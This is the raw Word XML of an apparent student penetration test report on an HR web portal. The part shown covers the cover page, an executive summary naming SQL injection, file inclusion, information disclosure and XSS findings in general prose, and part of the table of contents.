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84782" w14:textId="77777777" w:rsidR="009B42F8" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t>We Test Pens Incorporated</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BDC0D1B" w14:textId="77777777" w:rsidR="009B42F8" w:rsidRDefault="00000000">
      <w:r>
        <w:t>COMP90074 - Web Security Assignment 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43EFBE91" w14:textId="262E2820" w:rsidR="009B42F8" w:rsidRDefault="00A37FA5">
      <w:r>
        <w:t>Jiahao Chen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F6EA0F5" w14:textId="1EC0CD94" w:rsidR="009B42F8" w:rsidRDefault="00A37FA5">
      <w:r>
        <w:t>1118749</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3221C081" w14:textId="77777777" w:rsidR="009B42F8" w:rsidRDefault="009B42F8"/>
    <w:p w14:paraId="53E2E51C" w14:textId="77777777" w:rsidR="009B42F8" w:rsidRDefault="009B42F8"/>
    <w:p w14:paraId="427C519E" w14:textId="77777777" w:rsidR="009B42F8" w:rsidRDefault="009B42F8"/>
    <w:p w14:paraId="3653EA33" w14:textId="77777777" w:rsidR="009B42F8" w:rsidRDefault="009B42F8"/>
    <w:p w14:paraId="4C4C6B29" w14:textId="77777777" w:rsidR="009B42F8" w:rsidRDefault="009B42F8"/>
    <w:p w14:paraId="2AB7EC6C" w14:textId="77777777" w:rsidR="009B42F8" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t>PENETRATION TEST REPORT FOR</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CF5AD9E" w14:textId="77777777" w:rsidR="009B42F8" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t>InHR</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t xml:space="preserve"> - WEB APPLICATION </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2812840E" w14:textId="77777777" w:rsidR="009B42F8" w:rsidRDefault="009B42F8">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6960D816" w14:textId="77777777" w:rsidR="009B42F8" w:rsidRDefault="009B42F8">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="434EBD60" w14:textId="77777777" w:rsidR="009B42F8" w:rsidRDefault="009B42F8">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3EC3EF9B" w14:textId="77777777" w:rsidR="009B42F8" w:rsidRDefault="009B42F8">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DCBDE14" w14:textId="77777777" w:rsidR="009B42F8" w:rsidRDefault="009B42F8">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11139E21" w14:textId="77777777" w:rsidR="009B42F8" w:rsidRDefault="009B42F8">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38A60B04" w14:textId="77777777" w:rsidR="009B42F8" w:rsidRDefault="009B42F8">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="550166AD" w14:textId="77777777" w:rsidR="009B42F8" w:rsidRDefault="009B42F8">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31CCECF7" w14:textId="77777777" w:rsidR="009B42F8" w:rsidRDefault="009B42F8">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1DAB8BB6" w14:textId="77777777" w:rsidR="009B42F8" w:rsidRDefault="009B42F8">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="591B7FA3" w14:textId="77777777" w:rsidR="009B42F8" w:rsidRDefault="009B42F8">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0EFC64BD" w14:textId="7639B08D" w:rsidR="009B42F8" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t xml:space="preserve">Report delivered: </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00A37FA5">
        <w:rPr>
          <w:b/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t>30</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="00A37FA5">
        <w:rPr>
          <w:b/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t>03</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="00A37FA5">
        <w:rPr>
          <w:b/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t>2023</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="1E3718EC" w14:textId="77777777" w:rsidR="000A16B1" w:rsidRDefault="000A16B1">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="588224A6" w14:textId="77777777" w:rsidR="00A37FA5" w:rsidRDefault="00A37FA5">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03B155F2" w14:textId="77777777" w:rsidR="009B42F8" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc131032145"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Executive Summary</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="466D91DF" w14:textId="77777777" w:rsidR="00FE79AC" w:rsidRPr="00E42A01" w:rsidRDefault="00FE79AC">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="453AC9A1" w14:textId="7A20C364" w:rsidR="009B42F8" w:rsidRDefault="00FE79AC">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE79AC">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Introduction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55F4DC25" w14:textId="77777777" w:rsidR="00C9432E" w:rsidRPr="00C9432E" w:rsidRDefault="00C9432E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="6"/>
          <w:szCs w:val="6"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D700014" w14:textId="1827072A" w:rsidR="006D6392" w:rsidRPr="00C9432E" w:rsidRDefault="00205DE5">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00205DE5">
        <w:t xml:space="preserve">I have conducted a security assessment of the new HR portal launched by </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00205DE5">
        <w:t>InHR</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00205DE5">
        <w:t xml:space="preserve">. My findings mainly indicate four significant vulnerabilities that affect this web application's integrity, </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00205DE5">
        <w:t>availability</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00205DE5">
        <w:t xml:space="preserve"> and confidentiality. The following outlines the identified vulnerabilities and assesses the web application's overall security posture.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="507E4894" w14:textId="77777777" w:rsidR="00205DE5" w:rsidRDefault="00205DE5" w:rsidP="006F30A5">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23046D91" w14:textId="36D97C32" w:rsidR="006D6392" w:rsidRDefault="00FE79AC" w:rsidP="006F30A5">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00857B1F">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Vulnerabilities:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C33A07D" w14:textId="77777777" w:rsidR="00C9432E" w:rsidRPr="00C9432E" w:rsidRDefault="00C9432E" w:rsidP="006F30A5">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="6"/>
          <w:szCs w:val="6"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1056BB70" w14:textId="2EC3A7AD" w:rsidR="00857B1F" w:rsidRDefault="006F30A5" w:rsidP="006F30A5">
      <w:r>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r w:rsidR="00857B1F">
        <w:t>SQLI on Search Page:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="347EB145" w14:textId="0245E3D1" w:rsidR="00857B1F" w:rsidRDefault="00205DE5" w:rsidP="00857B1F">
      <w:r w:rsidRPr="00205DE5">
        <w:t>Attackers can easily input arbitrary SQL queries on the search page, which leaks the whole database. Unauthorised access to sensitive data, including user passwords and system data, can be performed to fetch, modify or remove these data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E4176B5" w14:textId="77777777" w:rsidR="00205DE5" w:rsidRDefault="00205DE5" w:rsidP="00857B1F"/>
    <w:p w14:paraId="448A0922" w14:textId="502AE8DE" w:rsidR="00857B1F" w:rsidRDefault="006F30A5" w:rsidP="00857B1F">
      <w:r>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r w:rsidR="00857B1F">
        <w:t>LFI</w:t>
      </w:r>
      <w:r w:rsidR="006D6392">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08467E9A" w14:textId="209AA51F" w:rsidR="00857B1F" w:rsidRDefault="00205DE5" w:rsidP="00857B1F">
      <w:r>
        <w:t>Due to this vulnerability, attackers can access files such as </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:color w:val="0E101A"/>
        </w:rPr>
        <w:t>style.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:color w:val="0E101A"/>
        </w:rPr>
        <w:t>dashboard.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, etc. Sensitive data may therefore be leaked. Moreover, other potential attacks, such as code injection, could be possible due to LFI.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67BD4743" w14:textId="77777777" w:rsidR="00205DE5" w:rsidRDefault="00205DE5" w:rsidP="00857B1F"/>
    <w:p w14:paraId="41DD30BD" w14:textId="19347A59" w:rsidR="00857B1F" w:rsidRDefault="006F30A5" w:rsidP="00857B1F">
      <w:r>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r w:rsidR="00857B1F">
        <w:t>Information Disclosure</w:t>
      </w:r>
      <w:r w:rsidR="006D6392">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="222A69D6" w14:textId="624EB537" w:rsidR="006D6392" w:rsidRDefault="00E227D1" w:rsidP="00857B1F">
      <w:r>
        <w:t xml:space="preserve">Due to LFI, attackers can have access to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E227D1">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>dashboard.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">. Unfortunately, the developer carelessly left some comments in the file, containing sensitive information. This allows attackers to access </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004D33DD">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>retrieve.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66E32140" w14:textId="77777777" w:rsidR="00857B1F" w:rsidRDefault="00857B1F" w:rsidP="00857B1F"/>
    <w:p w14:paraId="1E95923A" w14:textId="6336666B" w:rsidR="004D33DD" w:rsidRDefault="006F30A5" w:rsidP="00857B1F">
      <w:r>
        <w:t xml:space="preserve">4. </w:t>
      </w:r>
      <w:r w:rsidR="00857B1F">
        <w:t>XSS in User Profile</w:t>
      </w:r>
      <w:r w:rsidR="00A67A94">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12A70A19" w14:textId="1942F61A" w:rsidR="005E1636" w:rsidRDefault="00205DE5" w:rsidP="00857B1F">
      <w:r w:rsidRPr="00205DE5">
        <w:t xml:space="preserve">The user profile page is vulnerable to XSS attacks. One of the blocks allows attackers to inject malicious scripts to steal sensitive information such as cookies, </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00205DE5">
        <w:t>DOM</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00205DE5">
        <w:t xml:space="preserve"> or local storage. AJAX calls can also be performed to let attackers pretend to be users to send requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38E80742" w14:textId="77777777" w:rsidR="00205DE5" w:rsidRPr="00FA777C" w:rsidRDefault="00205DE5" w:rsidP="00857B1F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E3D243F" w14:textId="5E05DABE" w:rsidR="00FA777C" w:rsidRDefault="00FA777C" w:rsidP="00857B1F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA777C">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Security Posture Assessment:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21A59CB1" w14:textId="77777777" w:rsidR="00926510" w:rsidRPr="00926510" w:rsidRDefault="00926510" w:rsidP="00857B1F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="6"/>
          <w:szCs w:val="6"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26C48781" w14:textId="5ED3FF43" w:rsidR="00676B18" w:rsidRDefault="00205DE5" w:rsidP="00857B1F">
      <w:r w:rsidRPr="00205DE5">
        <w:t>The pointed vulnerabilities above reveal that the HR portal has a weak security posture. They may lead to financial loss, reputational damage, and legal liability for the company. It is necessary to perform immediate remediations before the public launch to prevent the company and users from potential risks and threats.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05F49771" w14:textId="77777777" w:rsidR="00205DE5" w:rsidRDefault="00205DE5" w:rsidP="00857B1F"/>
    <w:p w14:paraId="2D36CAEE" w14:textId="4003AB6B" w:rsidR="009B42F8" w:rsidRDefault="00676B18" w:rsidP="00857B1F">
      <w:r>
        <w:t>Proof of each vulnerability and corresponding mitigations are provided below in detail.</w:t>
      </w:r>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A13DD9C" w14:textId="77777777" w:rsidR="009B42F8" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Table of Contents</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="572978A5" w14:textId="77777777" w:rsidR="009B42F8" w:rsidRDefault="009B42F8">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sdt>
      <w:sdtPr>
        <w:id w:val="-1255046356"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Table of Contents"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtContent>
        <w:p w14:paraId="5C4E4086" w14:textId="281E7BDE" w:rsidR="00900598" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> TOC \h \u \z \t "Heading 1,1,Heading 2,2,Heading 3,3,Heading 4,4,Heading 5,5,Heading 6,6,"</w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:hyperlink w:anchor="_Toc131032145" w:history="1">
            <w:r w:rsidR="00900598" w:rsidRPr="008A3FB1">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Executive Summary</w:t>
            </w:r>
            <w:r w:rsidR="00900598">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00900598">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00900598">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc131032145 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00900598">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00900598">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00F55CD0">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="00900598">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="410E41A0" w14:textId="2F082700" w:rsidR="00900598" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc131032146" w:history="1">
            <w:r w:rsidR="00900598" w:rsidRPr="008A3FB1">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Summary of Findings</w:t>
            </w:r>
            <w:r w:rsidR="00900598">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00900598">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00900598">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc131032146 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00900598">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00900598">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00F55CD0">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r w:rsidR="00900598">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5AF87502" w14:textId="62F77580" w:rsidR="00900598" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc131032147" w:history="1">
            <w:r w:rsidR="00900598" w:rsidRPr="008A3FB1">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Detailed Findings</w:t>
            </w:r>
            <w:r w:rsidR="00900598">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00900598">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00900598">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc131032147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08ADBE6C" w14:textId="683F58C6" w:rsidR="00900598" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc131032148" w:history="1">
            <w:r w:rsidR="00900598" w:rsidRPr="008A3FB1">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve">Finding 1 </w:t>
            </w:r>
            <w:r w:rsidR="009A7406">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>–</w:t>
            </w:r>
            <w:r w:rsidR="00900598" w:rsidRPr="008A3FB1">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="009A7406">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>SQLI on Search Page</w:t>
            </w:r>
            <w:r w:rsidR="00900598">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00900598">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00900598">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc131032148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0C6EEFE8" w14:textId="136A0E10" w:rsidR="00900598" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc131032149" w:history="1">
            <w:r w:rsidR="00900598" w:rsidRPr="008A3FB1">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
            <w:r w:rsidR="00900598">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00900598">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00900598">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc131032149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16F65360" w14:textId="2BAB271F" w:rsidR="00900598" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc131032150" w:history="1">
            <w:r w:rsidR="00900598" w:rsidRPr="008A3FB1">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:t>Proof of Concept</w:t>
            </w:r>
            <w:r w:rsidR="00900598">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00900598">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00900598">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc131032150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02E95748" w14:textId="47897815" w:rsidR="00900598" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc131032151" w:history="1">
            <w:r w:rsidR="00900598" w:rsidRPr="008A3FB1">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:t>Impact</w:t>
            </w:r>
            <w:r w:rsidR="00900598">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00900598">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00900598">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc131032151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4CC60A9F" w14:textId="010D5FBC" w:rsidR="00900598" w:rsidRDefault="00000000">
          <w:pPr>
